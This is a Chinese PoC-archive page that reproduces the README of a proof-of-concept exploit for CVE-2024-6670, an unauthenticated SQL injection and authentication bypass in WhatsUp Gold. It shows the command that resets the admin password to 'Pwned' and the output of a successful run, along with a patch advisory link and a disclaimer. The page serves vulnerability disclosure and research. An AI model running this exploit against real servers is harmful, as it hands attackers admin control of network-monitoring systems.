关联漏洞
标题:WhatsUp Gold 安全漏洞 (CVE-2024-6670)Description:Progress Software WhatsUp Gold是美国Progress Software公司的一款网络监控软件。用于监控整个网络基础设施以及应用程序、配置和网络流量。 WhatsUp Gold 2024.0.0 版本之前存在安全漏洞,该漏洞源于未经身份验证的攻击者检索用户加密的密码。
介绍
# CVE-2024-6670
PoC for Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[](https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/)
## Usage
```
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned
```
## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
## Manish Kishan Tanwar
If it wasn’t because of the motivation and lessons that my dear friend [Manish](https://x.com/indishell1046) has taught me over the years I have known him, I wouldn’t be able to exploit this bug, thank you my friend.
## Follow Us on Twitter(X) for the latest security research:
* [SinSinology](https://x.com/SinSinology)
* [SummoningTeam](https://x.com/SummoningTeam)
## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
文件快照
[4.0K] /data/pocs/0367cdfedbf2cfaed785c1fde1256c6037c3856d
├── [3.8K] CVE-2024-6670.py
├── [ 44K] poc.png
└── [2.3K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。